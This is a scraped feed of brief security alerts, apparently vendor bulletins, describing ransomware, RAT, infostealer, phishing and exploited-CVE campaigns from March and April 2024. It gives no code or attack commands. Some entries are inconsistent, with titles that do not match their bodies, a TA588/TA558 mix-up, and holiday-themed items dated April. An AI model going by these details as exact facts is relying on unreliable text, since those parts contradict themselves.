17.4.24 | Rincrypt Ransomware | ALERTS | RANSOM | Rincrypt is one more run-of-the-mill ransomware variant recently observed on the threat landscape. When executed, it targets files with specific extensions from a pre-defined list. The malware appends the ".rincrypt" extension to encrypted files. Once encryption completes, a ransom note file called "READ THIS.txt" is dropped onto the desktop of the infected machine. It contains an email address for the victims to contact for further instructions.
17.4.24 | Tax-themed phishing campaign deploys XWorm RAT | ALERTS | VIRUS | An email phishing campaign has been reported deploying the Remote Access Trojan (RAT) XWorm. The attack begins with an HTML attachment posing as a tax document. Upon opening, it triggers the download of a JavaScript file which then executes a PowerShell script. This script can terminate running processes, manage decoy PDF files, disable User Account Control (UAC), and ultimately deliver the XWorm payload.
17.4.24 | Risen Ransomware | ALERTS | RANSOM | A ransomware actor known as "Risen" has been detected in the wild. According to their ransom note ($Risen_Note.txt and $risen_guide.hta), the threat actors appear to employ double-extortion tactics, threatening to sell or leak stolen information if the ransom is not paid. Encrypted files have an extension added to them in the following format: [actor's email address, TELEGRAM:actor's ID].random ID. Victims are provided with two email addresses, a Telegram ID, and a blog URL (hosted on the Tor network) as means of contact.
16.4.24 | SteganoAmor campaign attributed to TA558 threat group | ALERTS | GROUP | A new malicious campaign dubbed SteganoAmor has been attributed to the TA558 threat actor. The attackers have been leveraging steganography, concealing malicious code inside image files. TA558 is a threat group known to target the tourism and hospitality sectors, with an extensive focus on targets located in Latin America. In their attacks the group continues to leverage an old Microsoft Office Equation Editor vulnerability from 2017, CVE-2017-11882. The delivered payloads vary and include malware from the Remcos, Agent Tesla, Formbook, GuLoader, Lokibot, XWorm and several other families.
16.4.24 | L00KUPRU Ransomware | ALERTS | RANSOM | L00KUPRU is a new Xorist ransomware variant recently discovered in the wild. The malware encrypts user files and adds the .L00KUPRU extension to them. The attackers drop a ransom note as a text file called "HOW TO DECRYPT FILES.txt" and demand payment in Bitcoin. Additionally, the ransom note is displayed in a pop-up window on the desktop, providing the victims with the attackers' contact details as well as a BTC wallet address for payment.
16.4.24 | SolarMarker malware campaign adapts with PyInstaller for obfuscation | ALERTS | VIRUS | A SolarMarker malware campaign has been observed using PyInstaller instead of Inno Setup and PS2EXE to obfuscate first-stage PowerShell scripts, showcasing the adaptability of threat actors in evading detection mechanisms targeting SolarMarker. SolarMarker is typically spread through Search Engine Optimization poisoning (SEO poisoning). In this campaign, users were tempted to download a disguised PDF document from a website impersonating a reputable Southern Californian medical university.
16.4.24 | Hive0051c malware campaign distributing GammaLoad in Ukraine | ALERTS | VIRUS | Hive0051c has been observed conducting a malware campaign distributing the GammaLoad malware in Ukraine. The attack vector was phishing emails containing Ukrainian-language lure documents targeting military and government entities. The GammaLoad backdoor presents the risk of various follow-on payloads, facilitated by independent C2 fallback channels. Hive0051c used synchronized DNS fluxing across multiple channels to rotate infrastructure and maintained several active C2 clusters.
16.4.24 | FatalRAT Distributed Through Fake Cryptocurrency App Website | ALERTS | VIRUS | A new malicious campaign has been identified in which the attackers attempt to distribute FatalRAT malware via a webpage masquerading as a legitimate cryptocurrency application download site, specifically designed for Chinese users. Once the RAT payload is installed, it can steal personal information from victims and perform keylogging.
16.4.24 | Fake Anti Radar App SpyNote RAT Targets French Drivers | ALERTS | VIRUS | Speed cameras are quite prevalent in France, and their numbers have increased significantly over the years as part of road safety measures. They are deployed in various locations, including highways, urban areas, and rural roads, to monitor and enforce speed limits. These cameras are often placed strategically in areas prone to speeding or high accident rates, such as near schools, construction zones, and dangerous curves.
16.4.24 | XploitSPY Android malware | ALERTS | VIRUS | An active malicious campaign dubbed "eXotic Visit" has recently been spreading a customized variant of the XploitSPY Android malware. The campaign, which reportedly started back in 2021, has been delivering malicious apps hosted on either dedicated websites or the Google Play store. The most recent variants of this malware incorporate code updates for obfuscation, emulator detection and the use of native libraries to hide attacker information, among others. XploitSPY can extract call logs, contacts and text messages from the infected device, and can also take pictures, record audio and send SMS messages.
13.4.24 | Signed backdoor found in screen mirroring software | ALERTS | VIRUS | A recent report identified a signed backdoor present in LaiXi Android screen mirroring software. According to the report, attackers abused the Microsoft Windows Hardware Compatibility Program to get the malware signed. The malware contains an embedded freeware proxy server, likely intended to watch and potentially manipulate network traffic.
12.4.24 | LightSpy malware implant | ALERTS | VIRUS | LightSpy is a modular surveillance tool with variants supporting both Android and iOS platforms. This malware implant can exfiltrate private user information, GPS location data, SMS messages, messenger app data, phone call history and more. LightSpy can also comprehensively track browser history on the infected device, remotely execute shell commands and record voice over IP (VoIP) call sessions.
12.4.24 | Rhadamanthys malware deployments attributed to TA547 | ALERTS | VIRUS | A new Rhadamanthys infostealer deployment campaign attributed to the TA547 threat actor has been discovered in the wild. The campaign targets a wide range of industries in Germany. In their attacks, the attackers leverage .zip archives containing malicious .lnk files that, once executed, trigger PowerShell scripts leading to a Rhadamanthys infection on the compromised endpoint. The deployed malware payload has various capabilities, including collection and exfiltration of confidential user data such as credentials and cookies.
11.4.24 | Pupy RAT continues to be used in attacks against Linux systems | ALERTS | VIRUS | Pupy RAT continues to be leveraged in attacks conducted by various threat operators. The malware has a range of functionality, including file upload/download, remote command execution, information theft, keylogging and screenshot capture, among others. While Pupy RAT is known to target both Windows and Linux systems, recently reported campaigns have used the Linux variant of this malware against targets in Asia.
11.4.24 | Metasploit Meterpreter observed in attacks targeting vulnerable Redis servers | ALERTS | HACKING | Meterpreter is an advanced Metasploit attack payload leveraged in penetration testing that uses in-memory DLL injection stagers. The tool has been abused by various threat actors for a long time. In a recently reported campaign, Meterpreter has been observed being deployed to vulnerable or misconfigured Redis servers. The attackers have also been using a privilege escalation tool called PrintSpoofer. Meterpreter deployment to vulnerable servers is an initial attack step that can lead to deployment of further arbitrary payloads such as cryptominers or ransomware.
11.4.24 | Nitrogen malware delivery campaign | ALERTS | CAMPAIGN | A new malicious campaign spreading the Nitrogen malware has been observed in the wild. The attack leverages malvertising via Google Ads, and the malware binaries are masqueraded as PuTTY or FileZilla software installers. Nitrogen uses DLL sideloading to infect the targeted system. Once deployed, this malware is generally used to gain initial access, allowing network compromise and additional arbitrary payload deployments.
9.4.24 | SpyNote mobile malware spread under the disguise of INPS Mobile application | ALERTS | VIRUS | A recent campaign targeted at mobile users in Italy has been distributing SpyNote malware under the disguise of the INPS Mobile application. INPS (National Institute for Social Security) is the main social security organisation in Italy, and the INPS Mobile app gives INPS users access to various consultation and documentation services. The malicious app disguised as INPS Mobile is distributed via a phishing page that resembles the official INPS website. The SpyNote malware payload has various capabilities, including keylogging, SMS theft, screenshot grabbing, call recording and installation of additional arbitrary payloads.
9.4.24 | Nova Stealer among the malware variants distributed via Facebook ads advertising fake AI services | ALERTS | VIRUS | A new infostealer distribution campaign has been reported in the wild, with attackers leveraging compromised Facebook accounts to advertise fake AI services impersonating well-known brands such as MidJourney, SORA AI, Evoto, ChatGPT-5 and DALL-E 3. The advertisements lead victims to download malicious software disguised as desktop versions of the mentioned AI programs. Nova Stealer, Rilide Stealer V4, Vidar and IceRAT were among the infostealing payloads distributed in this campaign, which is known to target users in various European countries.
8.4.24 | CVE-2023-7102, New Zero-Day vulnerability in Barracuda's ESG Appliance exploited | ALERTS | VULNEREBILITY | A Chinese threat actor, UNC4841, has been reported exploiting a new zero-day vulnerability identified as CVE-2023-7102 in Barracuda Email Security Gateway (ESG) appliances. The threat actor utilized an Arbitrary Code Execution (ACE) vulnerability within a third-party Perl module called Spreadsheet::ParseExcel to deploy a specially crafted Excel email attachment targeting a limited number of ESG devices. Barracuda has observed new variants of SEASPY and SALTWATER malware being deployed on these ESG devices.
8.4.24 | New phishing run spoofs International Card Services (ICS) | ALERTS | PHISHING | Symantec has observed a new wave of phish runs spoofing International Card Services BV to steal credentials. In this run, threat actors have not hyperlinked the phishing URL but included it in plain text along with the email content. As the call to action in this phishing run, the email recipients are asked to validate their email address. Interestingly, for this supposed email validation process the victims are required to copy and paste the phishing URL into the browser or type it manually. The victims are served with credential harvesting webpages once the phishing URL opens in a web browser.
8.4.24 | TISAK Ransomware | ALERTS | RANSOM | TISAK is a new ransomware variant observed in the wild. The malware appears to be a strain of the Proxima/BlackShadow ransomware family. It encrypts user data and appends the .Tisak extension to the files. Once encryption completes, a ransom note text file called Tisak_Help.txt is dropped within the encrypted locations on the infected machine. The malware can stop various system processes and services as well as delete volume shadow copies. The threat actors behind this ransomware variant threaten the victims with data publication if the ransom demands are not met.
8.4.24 | Spoofed Adobe Creative Cloud email notifications appear in phish runs | ALERTS | PHISHING | Adobe Creative Cloud provides a collection of applications for graphic design, video editing, web development, photography and more. Lately, Symantec has observed phishing runs that impersonate Adobe Creative Cloud and entice users to open fake notification emails. The email body content is kept short and mentions a pending document stored in the cloud. These phish emails attempt to lure users into clicking on phish URLs. Upon clicking the phish URLs presented in the email content, the victims are served with credential harvesting webpages.
8.4.24 | CVE-2023-41266 A path traversal vulnerability in Qlik Sense Enterprise under active exploitation | ALERTS | VULNEREBILITY | CVE-2023-41266 is a path traversal vulnerability affecting Qlik Sense Enterprise. If successfully exploited, this vulnerability allows an unauthenticated remote attacker to generate an anonymous session, which in turn allows them to transmit HTTP requests to unauthorized endpoints. Symantec's network protection technology, Intrusion Prevention System (IPS), has picked up scans through threat landscape monitoring that indicate a recent uptick in exploitation of this vulnerability, and it blocks these exploitation attempts to prevent further infection or damage to the system.
8.4.24 | Xamalicious Android malware | ALERTS | VIRUS | Xamalicious is a backdoor malware targeting the Android platform. The malware is built using the Xamarin framework, an open-source platform for creating apps with .NET and C#. The malware has previously been distributed by various apps hosted on Google Play and some other third-party platforms. Xamalicious can collect information about the infected device, including hardware info, the list of installed applications, geolocation info and network provider data, among others. A second-stage payload may allow the attackers to take full control of the infected device and perform additional fraudulent tasks.
8.4.24 | Binance Turkey Users Lured with MASAK Audit Scare | ALERTS | CRIME | More Binance smishing is being observed around the world, and in a recent example, Symantec has observed an actor targeting Turkish Binance users. The social engineering tactic in the messages is different from other, more generic ones. Here they bait users with account issues (preventing them from buying, selling, and transferring crypto) related to an audit conducted by the Financial Crimes Investigation Board (MASAK), a regulatory authority in Turkey responsible for combating money laundering and terrorism financing.
8.4.24 | Continuous activities of UAC-0099 threat group against Ukraine | ALERTS | GROUP | "UAC-0099" is a threat group known to have been targeting Ukraine since at least mid-2022. In some of their recent campaigns the attackers have been leveraging self-extracting RAR (SFX) archives, .LNK files masqueraded as WordPad documents, PowerShell scripts and a LONEPAGE VBS malware payload. UAC-0099 has also been observed exploiting the known WinRAR vulnerability CVE-2023-38831 within the infection chain of their attacks.
8.4.24 | Bandook malware - an older threat remains active in the wild | ALERTS | VIRUS | Bandook is a remote access trojan first discovered in 2007. While it is quite an old malware family, new variants of Bandook re-emerge in the wild with new distribution campaigns to this day. In one such recent run, Bandook has been spread with the help of malicious PDF files leading to the download of password-protected 7z archives that, once extracted, deliver the Bandook payload. Upon infection, the malware executes commands received from the attacker-controlled C2 servers. The payload can also download additional arbitrary modules and executables.
8.4.24 | Malicious SMS Targets BDO Unibank users | ALERTS | VIRUS | Banco De Oro (BDO) Unibank is the largest bank in the Philippines and among the top 20 banks in Southeast Asia. Over the past few weeks, Symantec has observed recurrent malicious SMS in which actors are attempting to lure the bank's mobile users into providing sensitive information that will eventually lead to financial theft. This campaign, while it mostly affects consumers, has also been observed targeting corporate users.
8.4.24 | No Christmas Break for Agent Tesla: Riyad Bank Impersonated in a Malspam Campaign | ALERTS | VIRUS | Usually over Christmas there is somewhat less malware activity, but that does not mean there isn't any. Attacks from all fronts (e.g., email, drive-by downloads, vulnerabilities, etc.) keep on going. In a recent example, an Agent Tesla malspam campaign caught Symantec's attention, with the actor impersonating Riyad Bank, a major financial institution in Saudi Arabia and one of the largest banks in the country by assets.
8.4.24 | Truist Bank users targeted with new phishing emails | ALERTS | PHISHING | Truist Bank is one of the top U.S. commercial banks, headquartered in Charlotte, North Carolina. Recently, Symantec has observed a new wave of phish runs spoofing Truist Bank services with fake account notifications. The email content mentions a "temporary hold" placed on the recipient's account that can be lifted after a proper verification is completed. It entices the user to click on a "Verify now" phish URL ready to steal credentials.
8.4.24 | MetaStealer distributed via malvertising | ALERTS | VIRUS | MetaStealer is an infostealer variant discovered back in 2022. It is known to be delivered via malspam campaigns as well as bundled with pirated software. Recently the malware has also been seen being delivered via malvertising. Upon clicking on the ads, the victim is redirected to malware landing pages masqueraded as download portals for AnyDesk or Notepad++ software. MetaStealer can collect various information from local browsers, steal credentials and cryptowallets, extract data from various third-party applications, and more.
8.4.24 | New variant of Chameleon Android malware allows for biometric authentication bypass | ALERTS | VIRUS | Chameleon is an Android banking malware that first emerged at the beginning of 2023. The malware has been used in earlier campaigns targeting Android users in Australia and in Poland and has been distributed under the disguise of banking or cryptocurrency apps. Chameleon's capabilities include keylogging, SMS harvesting, credential theft and cookie stealing, among others. The most recently discovered variant of this malware allows the attackers to bypass biometric authentication on the infected device, forcing it to fall back to standard authentication means such as PIN entry, and unlock the device.
8.4.24 | Operation HamsaUpdate | ALERTS | OPERATION | Operation HamsaUpdate is a recently identified campaign targeting Israeli customers using F5's network devices. The attackers have been reported to leverage wiper malware targeting Windows servers (variant called Hatef) as well as the Linux platform (variant called Hamsa).
8.4.24 | Fictitious OnlyFans premium mobile app revealed as SpyNote | ALERTS | VIRUS | OnlyFans' popularity worldwide has grown exponentially over the past few years. Positioned as a social media service, it has become a lucrative means of livelihood for many individuals. Yet, the intriguing dichotomy lies in its content, which ventures into the NSFW (Not Safe For Work) territory. Many users, while capitalizing on the platform's income potential, inadvertently tread a fine line that might lead them onto Santa's naughty list.
8.4.24 | Old MS Office vulnerability CVE-2017-11882 still leveraged for Agent Tesla delivery | ALERTS | VULNEREBILITY | CVE-2017-11882 is an older vulnerability affecting the Equation Editor component in Microsoft Office. Successful exploitation of this flaw could allow attackers to execute code remotely on the infected machines. Agent Tesla is a malware family still observed leveraging this old vulnerability in some recent campaigns.
8.4.24Movable Type API CVE-2021-20837 vulnerability under active exploitationALERTSVULNEREBILITYCVE-2021-20837 is a critical (CVSS score 9.8) command injection vulnerability affecting Movable Type API. If successfully exploited, this vulnerability enables remote code execution.
8.4.24GuLoader campaign: From Seoul to BrusselsALERTSVIRUSGuLoader's prevalence remains unwavering, and Symantec continues to observe actors conducting campaigns worldwide. One particular case has caught our attention, as the actor exhibits behavior reminiscent of a locust colony, traversing from field to field. In fact, this actor has been orchestrating a substantial campaign in South Korea over the past three weeks in three waves, recently shifting focus to Belgium.
8.4.24Xray RansomwareALERTSRANSOMXray is yet another ransomware actor that has been observed in the threat landscape, targeting companies' servers and clients. Capability-wise, it's a generic ransomware that allows the actor to determine which folders to encrypt and which to skip. Upon successful encryption, files will be appended with a .Xray extension.
8.4.24New phishing run spoofs Mexican Postal Service (Correos de Mexico)ALERTSPHISHINGSymantec has observed a new wave of phish runs spoofing Mexican Postal Service (Correos de Mexico) to steal credentials. The email content is kept specific and mentions an undelivered package. The reason for not delivering the package is stated as "failure to pay custom duties".
8.4.24TA544 activities involving IDAT LoaderALERTSVIRUSA new set of malicious activities attributed to the TA544 (aka Narwal Spider) threat group has been reported in the wild. This threat actor has been known to target various Italian organizations and entities in the past. In their latest campaigns, the attackers have been leveraging new variants of the IDAT Loader malware to deliver various payloads such as Remcos RAT or SystemBC malware.
8.4.24JaskaGO infostealer for Windows and macOSALERTSVIRUSJaskaGO is a new Go-based infostealer developed for both Windows and macOS platforms. The malware collects a wide range of data from the compromised machines including credentials, cookies, browser history, files from local folders, cryptowallets and others. Collected data is compressed into a .zip archive and forwarded to attackers C2 servers. Beside the info-stealing functionality JaskaGO can also execute shell commands received from attackers as well as download and run additional payloads.
8.4.24Splunk Remote Code Execution (RCE) vulnerability CVE-2023-46214ALERTSVULNEREBILITYCVE-2023-46214 is a recently disclosed remote code execution (RCE) vulnerability affecting Splunk Enterprise platform. Due to a flaw in processing of user-supplied extensible stylesheet language transformations (XSLT), remote attackers might be able to upload malicious XSLT resulting in remote code execution on the affected Splunk instance.
8.4.24Zimbra Collaboration XSS vulnerability CVE-2023-37580ALERTSVULNEREBILITYCVE-2023-37580 is a recently disclosed 0-day (CVSS score: 6.1) Cross-Site Scripting vulnerability affecting Zimbra Collaboration suite. Successful exploitation of the vulnerability may allow an attacker to compromise the confidentiality and integrity of the target system by means of malicious scripts injection.
8.4.24Play Ransomware - latest attacks against enterprisesALERTSRANSOMSymantec Security Response is aware of the recent CISA, FBI and ASD's ACSC alert regarding a number of recent targeted activities observed for the Play (aka PlayCrypt) ransomware. Play ransomware has been discovered back in June 2022, and since that time it has been used in multiple high-profile attacks.
8.4.24"No One Was Home" themed Evri phishing emails are making the roundsALERTSPHISHINGEvri is a parcel delivery company based in United Kingdom. As the holiday season has started, spoofed emails masqueraded as Evri parcel notifications have been observed. These emails entice the users to click phishing URLs in order to reschedule the delivery as "no one was home". The phishing URLs are constructed using hijacked domains and with a sole purpose of stealing credentials.
8.4.24CVE-2023-49070 Apache OFBiz RCE vulnerabilityALERTSVULNEREBILITYCVE-2023-49070 is a critical (CVSS score 9.8) pre-auth remote code execution vulnerability in Apache OFBiz. Successful exploitation of the vulnerability grants the attacker complete control over the server, allowing them to steal sensitive data, disrupt operations, or even launch further attacks against the organization’s network. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.
8.4.24African based telecommunications organizations targeted by Iranian Seedworm groupALERTSAPTThe Symantec Threat Hunter Team, part of Broadcom, observed a recent campaign by the Seedworm threat actor group, targeting telecommunications organizations in North and East Africa. This activity, which occurred in November 2023, leveraged some new and some existing features previously attributed to Seedworm.
8.4.24Fake NordVPN Installer Delivering SecTopRATALERTSVIRUSWhile monitoring for new stealers, Symantec has observed an actor who has set up a Telegram channel for a stealer dubbed Vortex. After following breadcrumbs, it appears that there are ongoing test-related activities. This malware is pretty much the same as many stealers that abuse both Discord and Telegram to report to the actors and exfiltrate stolen information.
5.4.24New JsOutProx malware variant observed in campaigns targeted at financial sectorALERTSVIRUSA new JsOutProx malware variant has been observed in recent campaigns targeted at financial sector in the Africa, the Middle East, South Asia, and Southeast Asia. JsOutProx RAT is attributed to a threat group known as Solar Spider. While in the past the group has been using GitHub repositories to host the malicious payloads, the latest attacks leverage repositories on the GitLab platform instead.
5.4.24Byakugan malwareALERTSVIRUSByakugan is a modular infostealer variant observed recently in the wild. The malware has been distributed under the disguise of a Adobe Reader installer. The malware receives commands from a remote C2 server that also acts as attacker's control panel. Byakugan's functionality includes keylogging, screen capture, coin mining, theft of information stored in the web browsers and arbitrary file download, among others.
5.4.24Phorpiex malware campaign targets finance sector in Europe and North AmericaALERTSVIRUSA malware campaign distributing Phorpiex botnet has been observed targeting entities in the finance sector across Europe and North America. As part of the attack, shortcut files with embedded malicious macros are used to infect user systems and download additional malware payloads. Phorpiex can work without an active C2 server and is mainly used to steal cryptocurrency using the crypto-clipping technique.
5.4.24Indonesia – Wedding invites used as lure by an SMS thiefALERTSSPAMIn mid-2023, an actor have been observed sending SMS messages to mobile users in Indonesia, enticing them to install an application posing as a wedding invitation. Over the past few months, more of these malicious applications have been detected. The malware's primary goal is to collect SMS messages and send them to the author's Telegram channel via a Telegram bot API.
5.4.24Latrodectus malwareALERTSVIRUSLatrodectus loader is a malware variant first discovered in November 2023. The malware has been recently distributed in malicious campaigns attributed to the TA577 and TA578 threat groups. The loader is mostly used in the initial stages of the attacks to execute remote commands and to download additional payloads. Notably, its distribution campaigns exhibit similarities with previous IcedID operations in techniques and infrastructure usage.
5.4.24Backdoor code found in XZ Utils libraryALERTSVIRUSOn March 29th a security alert was issued warning users about malicious backdoor code embedded in certain versions of XZ Utils, a popular library of data compression tools that is present in nearly every Linux distribution. The malicious code, tracked as CVE-2024-3094, is embedded in XZ Utils versions 5.6.0 and 5.6.1. and could allow remote, malicious actors to break sshd authentication and gain unauthorized access to the entire impacted system.
5.4.24MacOS Users targeted with InfostealersALERTSVIRUSMacOS users continue to be targeted with infostealers via malicious advertisements and fake websites. In a recent campaign, a counterfeit website offering free group meeting scheduling software was observed. This website installs an infostealer capable of extracting users' keychain data, credentials stored in web browsers, and information from cryptocurrency wallets.
5.4.24TA588 continues espionage activities in Latin AmericaALERTSGROUPThe TA558 group, known for targeting various sectors across Latin America, has recently been observed employing spam emails with malicious attachments to distribute Venom RAT, a remote access trojan derived from Quasar RAT. This malware is equipped with functionalities for harvesting sensitive data and gaining remote control over compromised systems.
5.4.24YouTube Hijacking: Rise in Attack Campaigns Distributing InfostealersALERTSHACKINGAn increase in attack campaigns utilizing YouTube has been observed, with threat actors hijacking existing popular YouTube accounts to distribute Vidar and LummaC2 Infostealer malwares. Users are lured with videos purporting to offer cracked versions of everyday programs like Adobe. Links provided in the comments section lead to malicious packages uploaded to MediaFire. Consequently, users unwittingly become infected by downloading and executing malicious code instead of the desired program.
3.4.24Napoli RansomwareALERTSRANSOMNapoli, a variant of Chaos ransomware, has recently been discovered in the wild. The malware encrypts user files, adds the .napoli extension and also changes the desktop wallpaper on the infected endpoints.
3.4.24Emergence of new Vultur banking trojan variant in mobile threat landscapeALERTSVIRUSA newer version of the Vultur banking trojan for Android has been observed in the wild. This version features enhanced evasion techniques and advanced remote control capabilities. In the recent campaign, victims are lured into installing a trojanized version of a security app via a link sent through SMS, along with instructions provided via a phone call.
3.4.24Indonesian Businesses Targeted in an Agent Tesla CampaignALERTSVIRUSSymantec has recently observed an individual or group running a targeted malspam campaign against Indonesian organizations, although instances have been seen in neighboring countries.
30.3.24CVE-2024-20767 - Adobe ColdFusion vulnerabilityALERTSVULNEREBILITYCVE-2024-20767 is a directory traversal vulnerability in Adobe ColdFusion, which is a development platform for building and deploying web and mobile applications. If successfully exploited, this vulnerability allows unauthenticated remote attackers to read arbitrary files on the system. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.
30.3.24Sync-Scheduler InfostealerALERTSVIRUSA Infostealer dubbed as Sync-Scheduler, written in C++, has been reported as being distributed concealed within Office document files. The malware employs file-nesting techniques to conceal its presence and is equipped with anti-analysis and defense evasion techniques. Upon compromising systems, it searches through users' personal directories for office documents such as Word, PowerPoint, and Excel files.
30.3.24WarzoneRAT malware re-emerges with new samplesALERTSVIRUSWarzoneRAT (also known as AveMaria) is a commodity Remote Access Trojan variant used by various threat groups in recent years. The malware functionality allows for remote control, remote shell and file operations, credential theft, keylogging, UAC bypass and more. Back in February 2024 the FBI dismantled the Warzone RAT malware operation and seized the infrastructure associated to this threat.
30.3.24TheMoon malware targets thousands of insecure routersALERTSVIRUSA new malicious campaign featuring an updated version of TheMoon, a notorious malware family has been reported. This latest variant of TheMoon appears to target insecure outdated home routers, particularly those manufactured by Asus, along with other IoT devices. After compromising these devices, the malware utilizes them to route traffic through a proxy service known as Faceless.
30.3.24Beware of FlightNightALERTSVIRUSA new threat actor has been observed using similar Tactics, Techniques and Procedures (TTPs) to recent Go-Stealer campaigns targeting Indian government entities. Named FlightNight because of its use of Slack channels named "FlightNight" it is likely the work of the same threat actor.
28.3.24Dropper disguised as legitimate PuTTy SoftwareALERTSVIRUSA threat actor has been reported purchasing an ad claiming to be the PuTTY homepage. This ad appeared at the top of the Google search results page, although it has since been removed. It appeared just before the official PuTTY website. This ad raised suspicion due to the domain name, which was unrelated to PuTTY. The PuTTY file advertised in the ad was actually malware, serving as a dropper written in the Go language. Upon execution, the dropper delivered the final payload, known as Rhadamanthys.
28.3.24Mispadu Stealer extends its reachALERTSVIRUSMispadu Stealer (known also as Ursa) has shown some increased activity in recent distribution campaigns. While originally this malware has been mostly targeting LATAM countries, the recently observed activity shows European countries to be targeted this time around as well. The malware delivery chain leverages .pdf documents containing URL links to .zip archive with malicious MSI installers or HTA scripts. Later stages include deployment of malicious VB Scripts and the Mispadu malware payloads. 
28.3.24Qilin ransomware remains an active threat in the landscapeALERTSRANSOMQilin, also known as Agenda, is a Rust-based ransomware variant discovered in 2022. The malware has been spreading actively in the wild in recent months, with ongoing developments evident in new versions. Qilin is known to be distributed under a Ransomware-as-a-Service (RaaS) model with its operators often employing double extortion tactics. Most recent campaigns utilise custom PowerShell scripts to target vCenter and ESXi instances.
28.3.24SnowLight downloader spread in campaigns exploiting F5 BIG-IP and ScreenConnect vulnerabilitiesALERTSVIRUSRecent malicious campaigns attributed to the UNC5174 threat group have been reported to exploit F5 BIG-IP (CVE-2023-46747) and Connectwise ScreenConnect (CVE-2024-1709) vulnerabilities for malware delivery. One malware variant, SnowLight, is a C-based downloader for Linux, used by the threat actors to download and execute secondary payloads on the infected machines. GoreVerse, GoHeavy and SuperShell are payload variants distributed by UNC5174 in the reported campaigns.
27.3.24Stately Taurus APT Campaign Targeting Asian CountriesALERTSAPTResearchers observed a recent Stately Taurus (aka Mustang Panda) APT campaign during an ASEAN-Australia Special Summit held just this month targeting Asian countries. Two malware packages were created and deployed for this recent attack - one is a ZIP format and the other one is a SCR file. Both of these packages' main goal is to deploy malware with the use of abused copies of applications from known software developers like QFX Sofware Corporation and Electronic Arts, Inc..
27.3.24VCURMS and STRRAT being delivered via links in spam messagesALERTSVIRUSA java downloader has been discovered delivering VCURMS and STRRAT remote access trojans. This downloader is deployed via email with links to malicious JAR files. These two RATs will then download a modified Rude Stealer and keylogger for data exfiltration.
26.3.24 | New backdoor WineLoader | ALERTS | VIRUS | Phishing attacks impersonating political parties, using an invitation to a wine-tasting event as a lure for diplomats, have been used to deploy WineLoader malware. WineLoader is a new backdoor variant that shares features with BurntBatter, BeatDrop and MuskyBeat, which are associated with APT29. Once deployed, WineLoader collects information from the infected machine (victim's username, process name, device name, etc.) and exfiltrates it to the C2. The C2 can then decide to execute additional modules to perform further tasks such as establishing persistence.
26.3.24 | New remote control backdoor leveraging malicious drivers emerges in China | ALERTS | VIRUS | In a recent campaign observed in China, a new remote control backdoor was distributed. The threat actors behind the campaign utilized malicious kernel-mode drivers to carry out exploitation activities. The backdoor exhibited various capabilities, including disabling anti-virus software, stealing keyboard input, and downloading additional malware files such as miners and rootkits from command-and-control (C2) servers for execution. This campaign underscores the expectation that threat actors will continue to utilize rootkits to conceal malicious code from security tools, thereby weakening defenses and evading detection for extended periods of time.
26.3.24 | Emergence of Mirai Nomi in the Threat Landscape | ALERTS | BOTNET | A new Mirai botnet variant, named Mirai Nomi, has emerged in the threat landscape. This variant features modified UPX packing, a time-dependent Domain Generation Algorithm (DGA) for command and control, and multiple encryption and hashing algorithms. It includes capabilities such as file deletion, process termination, persistence and elimination of competing bots. Although not very active, its capabilities raise concerns about potential future threats.